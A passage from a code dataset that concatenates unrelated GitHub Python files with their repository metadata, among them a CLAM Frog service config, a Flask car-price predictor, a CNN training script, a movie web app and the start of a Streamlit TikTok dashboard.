if not 'CLAMTEST' in os.environ:\n ROOT = \"/scratch2/www/webservices-lst/live/writable/frog/\"\n if 'CLAMSSL' in os.environ:\n PORT = 443\n else:\n PORT = 80\n else:\n ROOT = \"/scratch2/www/webservices-lst/test/writable/frog/\"\n PORT = 81\n\n USERS_MYSQL = {\n 'host': 'mysql-clamopener.science.ru.nl',\n 'user': 'clamopener',\n 'password': D(open(os.environ['CLAMOPENER_KEYFILE']).read().strip()),\n 'database': 'clamopener',\n 'table': 'clamusers_clamusers'\n }\n DEBUG = False\n REALM = \"WEBSERVICES-LST\"\n DIGESTOPAQUE = open(os.environ['CLAM_DIGESTOPAQUEFILE']).read().strip()\n SECRET_KEY = open(os.environ['CLAM_SECRETKEYFILE']).read().strip()\n ADMINS = ['proycon','antalb','wstoop']\n FLATURL = \"https://flat.science.ru.nl\"\n elif host == 'mlp01': #new server (Nijmegen)\n HOST = \"webservices-lst.science.ru.nl\"\n URLPREFIX = 'frog'\n\n if not 'CLAMTEST' in os.environ:\n ROOT = \"/var/www/webservices-lst/live/writable/frog/\"\n if 'CLAMSSL' in os.environ:\n PORT = 443\n else:\n PORT = 80\n else:\n ROOT = \"/var/www/webservices-lst/test/writable/frog/\"\n PORT = 81\n\n USERS_MYSQL = {\n 'host': 'mysql-clamopener.science.ru.nl',\n 'user': 'clamopener',\n 'password': D(open(os.environ['CLAMOPENER_KEYFILE']).read().strip()),\n 'database': 'clamopener',\n 'table': 'clamusers_clamusers'\n }\n DEBUG = False\n REALM = \"WEBSERVICES-LST\"\n DIGESTOPAQUE = open(os.environ['CLAM_DIGESTOPAQUEFILE']).read().strip()\n SECRET_KEY = open(os.environ['CLAM_SECRETKEYFILE']).read().strip()\n ADMINS = ['proycon','antalb','wstoop']\n FLATURL = \"https://flat.science.ru.nl\"\nelif os.path.exists('/usr/bin/frog') and os.path.exists(\"/home/vagrant\") and os.getuid() == 998:\n # Virtual Machine (LaMachine)\n ROOT = \"/home/vagrant/frog.clam/\"\n PORT = 8801\n BINDIR = '/usr/bin/'\n FLATURL = \"http://127.0.0.1:8000\" #local LaMachine FLAT\nelif 
os.path.exists('/usr/bin/frog') and os.getuid() == 0 and os.path.exists('/etc/arch-release'):\n # Docker (LaMachine)\n ROOT = \"/clamdata/frog.clam/\"\n PORT = 8801\n BINDIR = '/usr/bin/'\n FLATURL = \"http://127.0.0.1:8000\" #local LaMachine FLAT\nelif host == \"hostnameofyoursystem\":\n #**** adapt hostname and add custom configuration for your system here ****\n raise NotImplementedError\nelse:\n raise Exception(\"I don't know where I'm running from! Got \" + host)\n\n\n\n\n#The system command (Use the variables $STATUSFILE $DATAFILE $PARAMETERS $INPUTDIRECTORY $OUTPUTDIRECTORY $USERNAME)\nCOMMAND = WRAPPERDIR + \"/frogwrapper.py \" + BINDIR + \" $DATAFILE $STATUSFILE $OUTPUTDIRECTORY > $OUTPUTDIRECTORY/log\"\n\n\nPROFILES = [\n Profile(\n InputTemplate('maininput', PlainTextFormat,\"Text document\",\n StaticParameter(id='encoding',name='Encoding',description='The character encoding of the file', value='utf-8'),\n StringParameter(id='author', name='Author', description='The author of the document (optional)'),\n StringParameter(id='docid', name='Document ID', description='An ID for the document (optional, used with FoLiA XML output)'),\n BooleanParameter(id='sentenceperline', name='One sentence per line?', description='If set, assume that this input file contains exactly one sentence per line'),\n PDFtoTextConverter(id='pdfconv',label='Convert from PDF Document'),\n MSWordConverter(id='mswordconv',label='Convert from MS Word Document'),\n CharEncodingConverter(id='latin1',label='Convert from Latin-1 (iso-8859-1)',charset='iso-8859-1'),\n CharEncodingConverter(id='latin9',label='Convert from Latin-9 (iso-8859-15)',charset='iso-8859-15'),\n multi=True,\n extension='.txt',\n ),\n OutputTemplate('mainoutput', TadpoleFormat,\"Frog Columned Output (legacy)\", #named 'mainoutput' for legacy reasons\n SetMetaField('tokenisation','yes'),\n SetMetaField('postagging','yes'),\n SetMetaField('lemmatisation','yes'),\n SetMetaField('morphologicalanalysis','yes'),\n ParameterCondition(skip_contains='m',\n then=SetMetaField('mwudetection','no'),\n otherwise=SetMetaField('mwudetection','yes'),\n ),\n ParameterCondition(skip_contains='p',\n then=SetMetaField('parsing','no'),\n otherwise=SetMetaField('parsing','yes'),\n ),\n removeextensions=['.txt','.xml'],\n extension='.frog.out',\n copymetadata=True,\n multi=True,\n ),\n OutputTemplate('foliaoutput', FoLiAXMLFormat,\"FoLiA Document\",\n FoLiAViewer(),\n FLATViewer(url=FLATURL, mode='viewer'),\n removeextensions=['.txt'],\n extension='.xml',\n copymetadata=True,\n multi=True,\n ),\n ),\n Profile(\n InputTemplate('foliainput', FoLiAXMLFormat,\"FoLiA XML document\",\n extension='.xml',\n multi=True,\n ),\n OutputTemplate('mainoutput', TadpoleFormat,\"Frog Columned Output (legacy)\", #named 'mainoutput' for legacy reasons\n SetMetaField('tokenisation','yes'),\n SetMetaField('postagging','yes'),\n SetMetaField('lemmatisation','yes'),\n SetMetaField('morphologicalanalysis','yes'),\n ParameterCondition(skip_contains='m',\n then=SetMetaField('mwudetection','no'),\n otherwise=SetMetaField('mwudetection','yes'),\n ),\n ParameterCondition(skip_contains='p',\n then=SetMetaField('parsing','no'),\n otherwise=SetMetaField('parsing','yes'),\n ),\n removeextensions=['.xml','.txt'],\n extension='.frog.out',\n copymetadata=True,\n multi=True,\n ),\n OutputTemplate('foliaoutput', FoLiAXMLFormat,\"FoLiA Document\",\n FoLiAViewer(),\n FLATViewer(url=FLATURL, mode='viewer'),\n extension='.xml',\n copymetadata=True,\n multi=True,\n ),\n ),\n\n]\n\nPARAMETERS = [\n\n 
('Modules', [\n        ChoiceParameter('skip', 'Skip modules','Are there any components you want to skip? Skipping components you do not need may speed up the process considerably.',paramflag='--skip=',choices=[('t','Tokeniser'),('m','Multi-Word Detector'),('p','Parser'),('c','Chunker / Shallow parser'),('n','Named Entity Recognition')], multi=True ),\n        #ChoiceParameter('skip', 'Skip Components','Are there any components you want to skip? Skipping the parser speeds up the process considerably.',paramflag='--skip=',choices=[('p','Skip dependency parser'),('n',\"Don't skip anything\")] ),\n    ]),\n]\n","repo_name":"AymanYac/Neonec-Deep-Classsifier","sub_path":"install/lamachine/lib/python3.5/site-packages/CLAMServices-1.4.4-py3.5.egg/clamservices/config/frog.py","file_name":"frog.py","file_ext":"py","file_size_in_byte":8914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}{"seq_id":"73109347255","text":"# coding:utf-8\n\"\"\"\noldutility.py\nAuthor : Kouhei Osaki\nCreated : 2017/06/14\nLast-Modified : 2017/07/07\nVersion : 1.4.0\nDescription : Defines assorted utility functions (ad hoc)\n\"\"\"\n\n\nimport math\nfrom typing import Dict, List\nfrom simulator.oldmodels import AllTimeCloudlets, Devices, AllocationPlan, Cloudlet, Cloudlets, Point\n\n\ndef is_udrl(x, y, base_x, base_y):\n    \"\"\"\n    Check whether (x, y) is directly above, below, left or right of (base_x, base_y)\n    :param x: x coordinate to check\n    :param y: y coordinate to check\n    :param base_x: reference x coordinate\n    :param base_y: reference y coordinate\n    :return: True if it is one of up/down/left/right, otherwise False\n    \"\"\"\n    if base_x == x and math.fabs(base_y - y) == 1:\n        return True\n    if math.fabs(base_x - x) == 1 and base_y == y:\n        return True\n    return False\n\n\ndef range2d(start, stop):\n    \"\"\"\n    Get two identical ranges over the same interval at once\n    :param start: \n    :param stop: \n    :return: \n    \"\"\"\n    n1 = range(start, stop)\n    n2 = range(start, stop)\n    return n1, n2\n\n\ndef create_input_data(file_save: bool=False, output_file: str=\"input_data.json\") -> Devices:\n    \"\"\"\n    Generate input data and, if file_save is True, write it to a file as JSON\n    :param file_save: \n    :param output_file: output file path\n    :return: input data\n    \"\"\"\n    import json\n    from simulator.olddataset import create_devices\n    devices = create_devices()\n    if file_save is True:\n        input_data = {\"devices\": devices}\n        f = open(output_file, \"w\")\n        json.dump(input_data, f)\n        f.close()\n    return devices\n\n\ndef load_input_data(input_file: str=\"input_data.json\") -> Devices:\n    \"\"\"\n    Load input data from the given file\n    :param input_file: file the input data is stored in\n    :return: input data\n    \"\"\"\n    import json\n    f = open(input_file, \"r\")\n    input_data = json.load(f)\n    return input_data[\"devices\"]\n\n\ndef create_all_time_cloudlets(t_len: int, x_len: int, y_len: int, max_resource: int=5) -> AllTimeCloudlets:\n    \"\"\"\n    Create a 3-D list of Cloudlets with the given maximum lengths along the time, x and y axes.\n    :param t_len: maximum length of the time axis\n    :param x_len: maximum length of the x axis\n    :param y_len: maximum length of the y axis\n    :param max_resource: \n    :return: \n    \"\"\"\n    all_time_cloudlets = [[[Cloudlet(r=max_resource) for i in range(x_len)]\n                           for j in range(y_len)]\n                          for k in range(t_len)]  # type: AllTimeCloudlets\n    return all_time_cloudlets\n\n\ndef create_blank_allocation_plan(all_time_cloudlets: AllTimeCloudlets, devices: Devices) -> AllocationPlan:\n    \"\"\"\n    Create an empty allocation plan\n    :param all_time_cloudlets: 3-D list of Cloudlets\n    :param devices: list of Devices\n    :return: \n    \"\"\"\n    allocation_plan = {}  # type: AllocationPlan\n    for device in devices:\n        allocation_plan[device.name] = [None for i in range(len(all_time_cloudlets))]\n    return allocation_plan\n\n\ndef is_valid_cell(cloudlets: Cloudlets, x: int, y: int) -> bool:\n    if not (0 <= y < 
len(cloudlets)):\n        return False\n    if not (0 <= x < len(cloudlets[y])):\n        return False\n    return True\n\n\ndef is_valid_all_time_cell(all_time_cloudlets: AllTimeCloudlets, t: int, x: int, y: int) -> bool:\n    \"\"\"\n    Check whether the specified cell is valid within the Cloudlets\n    :param all_time_cloudlets: 3-D list of Cloudlets ([time][y][x])\n    :param t: time\n    :param x: x axis\n    :param y: y axis\n    :return: True if valid, False if not\n    \"\"\"\n    if not (0 <= t < len(all_time_cloudlets)):\n        return False\n    return is_valid_cell(all_time_cloudlets[t], x, y)\n\n\ndef get_udrl_cloudlet(cloudlets: Cloudlets, x: int, y: int) -> List[Cloudlet]:\n    pts = [Point(xx, yy) for xx in [x-1, x, x+1] for yy in [y-1, y, y+1] if is_udrl(xx, yy, x, y)]\n    return [cloudlets[p.y][p.x] for p in pts if is_valid_cell(cloudlets, p.x, p.y)]\n\n\ndef get_near_cloudlet(cloudlets: Cloudlets, x: int, y: int,\n                      distance: int, invalid_distance: int=0) -> List[Cloudlet]:\n    # cloudlets already seen\n    spc = []\n    # nearby cloudlets\n    near = []\n    spc.append(cloudlets[y][x])\n    targets = [cloudlets[y][x]]\n    if invalid_distance < 0:\n        near.append(cloudlets[y][x])\n    for now in range(1, distance + 1):\n        new = []\n        for t in targets:\n            p = get_cloudlet_point_from_cloudlets(t.name, cloudlets)\n            udrl = get_udrl_cloudlet(cloudlets, p.x, p.y)\n            for c in udrl:\n                if c not in spc:\n                    new.append(c)\n                    spc.append(c)\n                    if now > invalid_distance:\n                        near.append(c)\n        targets = new\n    return near\n\n\ndef get_cloudlet_point_from_cloudlets(name: str, cloudlets: Cloudlets) -> Point:\n    for y, row in enumerate(cloudlets):\n        for x, c in enumerate(row):\n            if c.name == name:\n                return Point(x, y)\n    else:\n        return None\n\n\ndef continuity(target: List[Point]) -> bool:\n    \"\"\"\n    Check whether the path held by target is contiguous via up/down/left/right steps\n    :param target: path to inspect\n    :return: True if contiguous, False if not\n    \"\"\"\n    prev = None  # type:Point\n    for point in target:\n        if prev is None:\n            # first element\n            prev = point\n            continue\n        if is_udrl(point.x, point.y, prev.x, prev.y):\n            prev = point\n        else:\n            return False\n    return True\n\n\ndef dist(p1: Point, p2: Point) -> int:\n    \"\"\"\n    Return the (Manhattan) distance between two points\n    :param p1: \n    :param p2: \n    :return: distance\n    \"\"\"\n    return int(math.fabs(p2.x - p1.x)) + int(math.fabs(p2.y - p1.y))\n\n\ndef scope(center: Point, distance_max: int,\n          x_max: int, y_max: int, distance_min: int=0, x_min: int=0, y_min: int=0) -> List[Point]:\n    ret = []  # type:List[Point]\n    for y in range(y_min, y_max + 1):\n        for x in range(x_min, x_max + 1):\n            point = Point(x, y)\n            if distance_min <= dist(center, point) <= distance_max:\n                ret.append(point)\n    return ret\n\n\n","repo_name":"kiko1995428/mecsimulator","sub_path":"CloudletSimulator/simulator/oldutility.py","file_name":"oldutility.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}{"seq_id":"28019858168","text":"\"\"\"Example code for the paper summary script\"\"\"\nfrom typing import Optional\n\nfrom src.paper_summary import (\n    download_paper,\n    get_paper_summary,\n    load_openai_api_key,\n    save_text_to_file,\n)\n\n\ndef main():\n    \"\"\"Main function\"\"\"\n\n    paper_url = \"shorturl.at/yBHTV\"\n    paper_out = \"./download/zhuo.pdf\"\n    summary_out = \"./output/zhuo_summary.txt\"\n    text_out: Optional[str] = \".output/summary/text_out\"\n\n    # Load the OpenAI API key\n    load_openai_api_key()\n\n    # Download the paper\n    if paper_url is not None:\n        download_paper(paper_url, paper_out)\n\n    # Get the summary of the paper\n    paper_text, paper_summary = get_paper_summary(paper_out)\n\n    # Save the summary of the paper\n    save_text_to_file(paper_summary, summary_out)\n\n    # Save the paper text\n    if 
text_out is not None:\n        save_text_to_file(paper_text, text_out)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"HinnyTsang/paper-summary","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}{"seq_id":"44681728922","text":"# variables\nnama = 'Rudy Aunallah Bumi Satrio' # count the number of spaces using split\ntotal = len(nama)\njumlah_spasi = len(nama.split(' ')) - 1\ntotal_tanpa_spasi = total - jumlah_spasi\n\nprint('Name', nama, 'contains:', total_tanpa_spasi, 'letters')\n\n# find a specific character using replace\nnama = 'Rudy Aunallah Bumi Satrio'\ncari_huruf = 'i'\nnama_tanpa_cari = nama.lower().replace(cari_huruf.lower(), '') \n# lower()/upper() is used so the search matches letters regardless of upper/lower case\njumlah_cari = len(nama) - len(nama_tanpa_cari)\n\nprint(nama_tanpa_cari)\nprint('The count of', cari_huruf, 'in', nama, 'is', jumlah_cari)\n\n","repo_name":"rudyabs/Materi-Purwadhika-Data_Science","sub_path":"belajar_python_fundamental/004a-len_split.py","file_name":"004a-len_split.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"}{"seq_id":"41628207620","text":"import numpy as np\r\nfrom flask import Flask, request, render_template\r\nimport joblib\r\n\r\napp = Flask(__name__)\r\nmodel = joblib.load('car_price_prediction.pkl')\r\n\r\n\r\n@app.route('/')\r\ndef home():\r\n    return render_template('index_car.html')\r\n\r\n\r\n@app.route('/predict', methods=['POST'])\r\ndef predict():\r\n    if request.method == 'POST':\r\n        Year = int(request.form['Year'])\r\n        Present_Price = float(request.form['Present_Price'])\r\n        Kms_Driven = int(request.form['Kms_Driven'])\r\n        Kms_Driven2 = np.log(Kms_Driven)\r\n        Owner = int(request.form['Owner'])\r\n        Fuel_Type_Petrol = request.form['Fuel_Type_Petrol']\r\n        if Fuel_Type_Petrol == 'Petrol':\r\n            Fuel_Type_Petrol = 1\r\n            Fuel_Type_Disel = 0\r\n        else:\r\n            Fuel_Type_Petrol = 0\r\n            Fuel_Type_Disel = 1\r\n        Year = 2020 - Year\r\n        Seller_Type_Individual = request.form['Seller_Type_Individual']\r\n        if Seller_Type_Individual == 'Individual':\r\n            Seller_Type_Individual = 1\r\n        else:\r\n            Seller_Type_Individual = 0\r\n        Transmission_Manual = request.form['Transmission_Manual']\r\n        if Transmission_Manual == 'Manual':\r\n            Transmission_Manual = 1\r\n        else:\r\n            Transmission_Manual = 0\r\n        prediction = model.predict([[Present_Price, Kms_Driven2, Owner, Year, Fuel_Type_Disel, Fuel_Type_Petrol, Seller_Type_Individual, Transmission_Manual]])\r\n        output = round(prediction[0], 2)\r\n        if output < 0:\r\n            return render_template('index_car.html', prediction_text='Sorry! 
You cannot sell this Car')\r\n        else:\r\n            return render_template('index_car.html', prediction_text='You can sell the car at Rs.{} lakhs'.format(output))\r\n    else:\r\n        return render_template('index_car.html')\r\n\r\n\r\nif __name__ == '__main__':\r\n    app.run(debug=True)","repo_name":"saurabhaherkar/Car-Price-Prediction-ML-Project-With-Deployment","sub_path":"app_car.py","file_name":"app_car.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"}{"seq_id":"3249283689","text":"import os\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom tqdm import tqdm\nfrom scipy.io import savemat\n\nfrom networksimulator import JacksonRogersModifiedModel\nfrom networkmeasure import integration\n\nif __name__ == '__main__':\n    # ----- Settings -----\n    # Model\n    mdl_sett_ = {\n        'n_s': 3,\n        'n_d': 2,\n        'n_f': 10,\n        'alpha': 4/5,\n        'ps': (0.7, 0.3),\n        'init_integrated': True\n    }\n\n    idx_ = 166\n\n    # Simulation\n    n_step_ = 300\n    n_rept_ = 10\n\n    # Path\n    save_path_ = os.path.join('..', 'results', 'sim_jr')\n    os.makedirs(save_path_, exist_ok=True)\n\n    # ----- Init. the model -----\n    jr_ = JacksonRogersModifiedModel(**mdl_sett_)\n\n    # ----- Big loop! ------\n    measures_ = np.zeros((n_rept_, n_step_,))\n    for i_rept_ in range(n_rept_):\n        jr_ = JacksonRogersModifiedModel(**mdl_sett_)\n\n        for i_step_ in tqdm(range(n_step_)):\n            jr_.forward_one_step()\n\n            measures_[i_rept_, i_step_] = integration(jr_.adj_mat, jr_.types)\n\n        # Plot\n        plt.plot(range(n_step_), measures_[i_rept_])\n\n    # ----- Calc. equilibrium -----\n    equil_ = (mdl_sett_['n_d'] + (1 - mdl_sett_['alpha'])*mdl_sett_['n_f']) \\\n        / (mdl_sett_['n_s'] + mdl_sett_['n_d'] + 2*(1 - mdl_sett_['alpha'])*mdl_sett_['n_f'])\n\n    plt.plot(range(n_step_), (equil_,) * n_step_, 'k--')\n\n    # ----- Save results -----\n    savemat(os.path.join(save_path_, 'sim_%d.mat' % idx_), {\n        'model_settings': mdl_sett_,\n        'integration': measures_\n    })\n\n\n\n","repo_name":"alishiraliGit/network-health-under-modification","sub_path":"scripts/simulate_jr.py","file_name":"simulate_jr.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}{"seq_id":"35600848532","text":"from network import Network\nfrom layers import Relu, Linear, Conv2D, AvgPool2D, Reshape\nfrom utils import LOG_INFO\nfrom loss import EuclideanLoss, SoftmaxCrossEntropyLoss\nfrom solve_net import train_net, test_net\nfrom load_data import load_mnist_4d\n\ntrain_data, test_data, train_label, test_label = load_mnist_4d('data')\n\n# Your model definition here\n# You should explore different model architectures\nmodel = Network()\nmodel.add(Conv2D('conv1', 1, 4, 3, 1, 0.01))\nmodel.add(Relu('relu1'))\nmodel.add(AvgPool2D('pool1', 2, 0))  # output shape: N x 4 x 14 x 14\nmodel.add(Conv2D('conv2', 4, 4, 3, 1, 0.01))\nmodel.add(Relu('relu2'))\nmodel.add(AvgPool2D('pool2', 2, 0))  # output shape: N x 4 x 7 x 7\nmodel.add(Reshape('flatten', (-1, 196)))\n# model.add(Reshape('flatten', (-1, 588)))\nmodel.add(Linear('fc3', 196, 10, 0.1))\n\nloss = SoftmaxCrossEntropyLoss(name='loss')\n\n# Training configuration\n# You should adjust these hyperparameters\n# NOTE: one iteration means model forward-backwards one batch of samples.\n#       one epoch means model has gone through all the training samples.\n# 'disp_freq' denotes number of iterations in one epoch to display information.\n\nconfig = {\n    'learning_rate': 0.1,\n    'weight_decay': 0.0,\n    'momentum': 0.001,\n    'batch_size': 100,\n    'max_epoch': 
100,\n    'disp_freq': 50,\n}\n\ndef save_file(name, array):\n    with open(name, 'w') as file:\n        for i in array:\n            file.write('%s,' % i)\n\nacc_train = []\nacc_test = []\nloss_train = []\nloss_test = []\n\nfor epoch in range(config['max_epoch']):\n    LOG_INFO('Training @ %d epoch...' % (epoch))\n    tmp_loss, tmp_acc = train_net(model, loss, config, train_data, train_label, config['batch_size'], config['disp_freq'])\n    acc_train.append(tmp_acc)\n    loss_train.append(tmp_loss)\n\n    LOG_INFO('Testing @ %d epoch...' % (epoch))\n    tmp_loss, tmp_acc = test_net(model, loss, test_data, test_label, config['batch_size'])\n    acc_test.append(tmp_acc)\n    loss_test.append(tmp_loss)\n\n    name = 'lr0.1mm0.001'\n    save_file(name + '_loss_train', loss_train)\n    save_file(name + '_acc_train', acc_train)\n    save_file(name + '_loss_test', loss_test)\n    save_file(name + '_acc_test', acc_test)\n","repo_name":"nielsyh/CNN-from-scratch-in-python","sub_path":"run_cnn.py","file_name":"run_cnn.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}{"seq_id":"4628352447","text":"from flask import Flask, request, url_for\r\nfrom typing import List\r\nimport os\r\nimport movie_web_app.adapters.repository as repo\r\nfrom movie_web_app.adapters import movie_repository, database_repository\r\nfrom movie_web_app.adapters.orm import metadata, map_model_to_tables\r\n\r\n\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import sessionmaker, clear_mappers\r\nfrom sqlalchemy.pool import NullPool\r\n\r\nfrom movie_web_app.domainmodel import model\r\n# from movie_web_app.domainmodel.user import User\r\nfrom movie_web_app.datafilereaders.movie_file_csv_reader import MovieFileCSVReader\r\nfrom movie_web_app.domainmodel.read_title import read_title\r\n\r\n\r\ndef create_app(test_config=None):\r\n    app = Flask(__name__)\r\n    app.config.from_object('config.Config')\r\n    data_path = os.path.join('movie_web_app', 'datafiles')\r\n\r\n    if test_config is not None:\r\n        # Load test configuration, and override any configuration settings.\r\n        app.config.from_mapping(test_config)\r\n        data_path = app.config['TEST_DATA_PATH']\r\n\r\n    if app.config['REPOSITORY'] == 'movie':\r\n        # Create the MemoryRepository instance for a memory-based repository.\r\n        filename = '/Users/takesei/Documents/GitHub/FlixWebAppWithSQL/movie_web_app/datafiles/Data1000Movies.csv'\r\n        movie_file_reader = MovieFileCSVReader(filename)\r\n        repo.repo_instance = movie_repository.MainRepository()\r\n        # repo.repo_instance.add_movies(movie_file_reader.dataset_of_movies)\r\n        # repo.repo_instance.add_actors(movie_file_reader.dataset_of_actors)\r\n        # repo.repo_instance.add_directors(movie_file_reader.dataset_of_directors)\r\n        # repo.repo_instance.add_genres(movie_file_reader.dataset_of_genres)\r\n\r\n        movie_repository.populate(data_path, repo.repo_instance)\r\n\r\n    elif app.config['REPOSITORY'] == 'database':\r\n        # Configure database.\r\n        database_uri = app.config['SQLALCHEMY_DATABASE_URI']\r\n\r\n        # We create a comparatively simple SQLite database, which is based on a single file (see .env for URI).\r\n        # For example the file database could be located locally and relative to the application in covid-19.db,\r\n        # leading to a URI of \"sqlite:///covid-19.db\".\r\n        # Note that create_engine does not establish any actual DB connection directly!\r\n        database_echo = app.config['SQLALCHEMY_ECHO']\r\n        database_engine = create_engine(database_uri, connect_args={\"check_same_thread\": False}, 
poolclass=NullPool,\r\n                                        echo=database_echo)\r\n\r\n        if app.config['TESTING'] == 'True' or len(database_engine.table_names()) == 0:\r\n            print(\"REPOPULATING DATABASE\")\r\n            # For testing, or first-time use of the web application, reinitialise the database.\r\n            clear_mappers()\r\n            metadata.create_all(database_engine)  # Conditionally create database tables.\r\n            for table in reversed(metadata.sorted_tables):  # Remove any data from the tables.\r\n                database_engine.execute(table.delete())\r\n\r\n            # Generate mappings that map domain model classes to the database tables.\r\n            map_model_to_tables()\r\n\r\n            repo.repo_instance = movie_repository.MainRepository()\r\n            movie_repository.populate(data_path, repo.repo_instance)\r\n\r\n            # data_filename = '/Users/takesei/Documents/GitHub/FlixSkeletonWebApp/movie_web_app/datafiles/Data1000Movies.csv'\r\n            # data_filename = 'Data1000Movies.csv'\r\n            # session_factory= sessionmaker(autocommit=False, autoflush= True,bind=database_engine)\r\n            # database_repository.populate_reader(session_factory, data_path, data_filename)\r\n            database_repository.populate(database_engine, data_path)\r\n\r\n        else:\r\n            # Solely generate mappings that map domain model classes to the database tables.\r\n            map_model_to_tables()\r\n\r\n        # Create the database session factory using sessionmaker (this has to be done once, in a global manner)\r\n        session_factory = sessionmaker(autocommit=False, autoflush=True, bind=database_engine)\r\n        # Create the SQLAlchemy DatabaseRepository instance for an sqlite3-based repository.\r\n        repo.repo_instance = database_repository.SqlAlchemyRepository(session_factory)\r\n\r\n\r\n    with app.app_context():\r\n        from .movie_blueprint import movie\r\n        app.register_blueprint(movie.movie_blueprint)\r\n\r\n        from .home_blueprint import home\r\n        app.register_blueprint(home.home_blueprint)\r\n\r\n        from .actor_blueprint import actor\r\n        app.register_blueprint(actor.actor_blueprint)\r\n\r\n        from .director_blueprint import director\r\n        app.register_blueprint(director.director_blueprint)\r\n\r\n        from .genre_blueprint import genre\r\n        app.register_blueprint(genre.genre_blueprint)\r\n\r\n        from .search_blueprint import search\r\n        app.register_blueprint(search.search_blueprint)\r\n\r\n        from .authentication import authentication\r\n        app.register_blueprint(authentication.authentication_blueprint)\r\n\r\n\r\n\r\n    # Register a callback that makes sure that database sessions are associated with http requests\r\n    # We reset the session inside the database repository before a new flask request is generated\r\n    @app.before_request\r\n    def before_flask_http_request_function():\r\n        if isinstance(repo.repo_instance, database_repository.SqlAlchemyRepository):\r\n            repo.repo_instance.reset_session()\r\n\r\n    # Register a tear-down method that will be called after each request has been processed.\r\n    @app.teardown_appcontext\r\n    def shutdown_session(exception=None):\r\n        if isinstance(repo.repo_instance, database_repository.SqlAlchemyRepository):\r\n            repo.repo_instance.close_session()\r\n\r\n    return app\r\n","repo_name":"Hanqing-Ouyang/FlixWebAppWithSQL","sub_path":"movie_web_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}{"seq_id":"20977236411","text":"# -*- coding: utf-8 -*-\n\n\n# import sys\n# print(\" * Loading libraries\")\n\n# from helper import session, check_evaluation\n# It would be nice to load this code from .helper, but\n# for some reason I cannot make the 
relative load work...\n\n# import time\n# from mathics.core.parser import parse, MathicsSingleLineFeeder\n# from mathics.core.definitions import Definitions\n# from mathics.core.evaluation import Evaluation\n# from mathics.core.expression import Expression, String\nfrom mathics.session import MathicsSession\n\n\nprint(\" * creating the session\")\n\nsession = MathicsSession()\n\n\ndef test_asymptote_cmd():\n    from subprocess import DEVNULL, STDOUT, check_call\n    from pymathics.asy import asy_path\n    res = check_call([asy_path, '--version'], stdout=DEVNULL, stderr=DEVNULL)\n    assert res == 0\n\nprint(\"Try calling asy\")\ntest_asymptote_cmd()\nprint(\" now the other tests...\")\n\n\ndef check_evaluation(str_expr: str, str_expected: str, message=\"\"):\n    \"\"\"Helper function to test a WL expression against\n    its expected result\"\"\"\n    result = session.evaluate(str_expr)\n    expected = session.evaluate(str_expected)\n\n#    print(time.asctime())\n    print(message)\n    if result == expected:\n        print(\" ->OK\\n\")\n    else:\n        print(\" unexpected result =\", result)\n\nprint(\" * building tests \")\n\ntests = ['A',\n         'MatrixForm[{{a,n},{c,d}}]; a+b',\n         'Integrate[f[x],x]',\n         'Evaluate[Plot[Cos[x],{x,0,20}]]',\n#         'Evaluate[Plot3D[Cos[x*y],{x,-1,1},{y,-1,1}]]',\n         'Evaluate[DensityPlot[Cos[x*y],{x,-1,1},{y,-1,1}]]',\n]\n\nfileformats = [\"test.pdf\", \n               \"test.svg\", \n               \"test.png\", \n               \"test.jpg\"\n]\n\ndef format_tests(str_expr: str, str_expected: str, message=\"\"):\n    check_evaluation(str_expr, str_expected, message)\n\n\ntest_inputs = [ ('LoadModule[\"pymathics.asy\"]', '\"pymathics.asy\"') ] +\\\n    [ ('Export[$TemporaryDirectory<>\"/\"<>\"'+ filename +'\", '+ test + ']',\n       f'$TemporaryDirectory <> \"/\" <> \"{filename}\"')\n      for test in tests\n      for filename in fileformats\n    ]\n\nprint(\" * starting tests\")\n\nfor expr, expected in test_inputs:\n    print(\"\\n\", 30*\"*\")\n    print(\"Expr:\", expr)\n    print(\"Expected:\", expected)\n    # check_evaluation(expr, expected)\n    print(30*\"*\",\"\\n\")\n\nprint(\"done\")\n","repo_name":"Mathics3/pymathics-asy","sub_path":"test/tmp_exporters.py","file_name":"tmp_exporters.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"}{"seq_id":"13217148715","text":"#Import streamlit dependency\nimport streamlit as st\n#Import pandas to load the analytics data\nimport pandas as pd\n#Import subprocess to run tiktok script from command line\nfrom subprocess import call\n#Import plotly for visualization\nimport plotly.express as px\nfrom PIL import Image\n\n#Set page width\nst.set_page_config(layout='wide')\n\n#Importing logo image\nimage = Image.open('logo.png')\n\n#Create a sidebar\nst.sidebar.image(image, caption='Tiktok Analytics' ,use_column_width=True)\n\nst.sidebar.markdown(\"This dashboard allows you to analyze tiktok data by hashtag\")\nst.sidebar.markdown(\"Get started by<br>
  1. Enter the hashtag you wish to analyse<br>
  2. Hit Get Data.<br>
  3. Get analyzing
